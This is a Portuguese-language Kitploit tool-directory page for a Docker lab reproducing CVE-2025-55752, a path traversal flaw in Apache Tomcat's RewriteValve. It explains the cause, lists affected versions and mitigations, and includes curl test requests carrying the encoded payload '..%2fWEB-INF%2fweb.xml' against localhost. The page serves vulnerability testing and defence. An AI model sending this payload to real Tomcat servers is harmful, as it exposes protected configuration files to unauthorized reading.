Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/masahiro331/cve-2025-55752
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmasahiro331/cve-2025-55752

CVE-2025-55752

# Ambiente de reprodução baseado em Docker para CVE-2025-55752, uma vulnerabilidade de path traversal no RewriteValve do Apache Tomcat, demonstrando a falha de normalização antes da decodificação e fornecendo comandos de teste.

Ver Repositório
143há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55752: Vulnerabilidade de Path Traversal no Apache Tomcat

Ambiente de reprodução baseado em Docker para CVE-2025-55752, uma vulnerabilidade de path traversal no Apache Tomcat 10.1.44.

Visão Geral

CVE-2025-55752 é uma vulnerabilidade de path traversal no RewriteValve do Apache Tomcat causada pelo processamento incorreto da ordem: a normalização de URL ocorre antes da decodificação de URL. Isso permite que atacantes contornem restrições de segurança que protegem diretórios como /WEB-INF/ usando sequências de path traversal codificadas em URL (..%2f).

Características da Vulnerabilidade

  • ID CVE: CVE-2025-55752
  • CVSS v3.1: 7.5 (ALTA)
  • CWE: CWE-22 (Path Traversal)
  • Componente: Apache Tomcat RewriteValve
  • Causa Raiz: Ordem de processamento normalizar-antes-de-decodificar

Versões Afetadas

SérieVersões VulneráveisVersão Corrigida
11.x11.0.0-M1 a 11.0.1011.0.11+
10.1.x10.1.0-M1 a 10.1.4410.1.45+
9.0.x9.0.0-M11 a 9.0.1089.0.109+
8.5.x8.5.6 a 8.5.100EOL - Sem correção

Início Rápido

root@kitploit:~
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/

Teste da Vulnerabilidade

Teste 1: Acesso Direto ao WEB-INF (Protegido)

root@kitploit:~
curl -I 'http://localhost:8080/WEB-INF/web.xml'

Esperado: 403 Forbidden

Teste 2: Divulgação de Informações (Leitura de Arquivos Protegidos)

root@kitploit:~
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'

Esperado: 200 OK + conteúdo do web.xml (vulnerabilidade confirmada)

Como Funciona

  1. Requisição: /download?path=..%2fWEB-INF%2fweb.xml
  2. RewriteValve reescreve para: /files/..%2fWEB-INF%2fweb.xml
  3. Normalização de URL (antes da decodificação): %2f não é reconhecido como /, .. sobrevive
  4. Decodificação de URL: %2f → / → /files/../WEB-INF/web.xml
  5. Resolução de caminho: /WEB-INF/web.xml

Problema na Ordem de Processamento

root@kitploit:~
Correto:    Decodificar → Normalizar → Verificação de Segurança
Vulnerável: Normalizar → Decodificar → Verificação de Segurança ✗

Correção do Tomcat

  • GitHub: apache/tomcat commit 130d36d8
  • Correção: Decodificar antes de normalizar

Mitigação

  1. Desative o RewriteValve se não for necessário
  2. Desative o método PUT
  3. Regras de WAF para bloquear ../ e %2e%2e
  4. Atualize para versões corrigidas (10.1.45+, 9.0.109+, 11.0.11+)

Referências

  • Segurança do Apache Tomcat
  • NVD - CVE-2025-55752
  • OWASP Path Traversal
  • CWE-22: Limitação Incorreta de um Nome de Caminho

Aviso Legal

⚠️ AVISO: Não implante em produção. Use apenas em ambientes de teste isolados.

Baixar ferramenta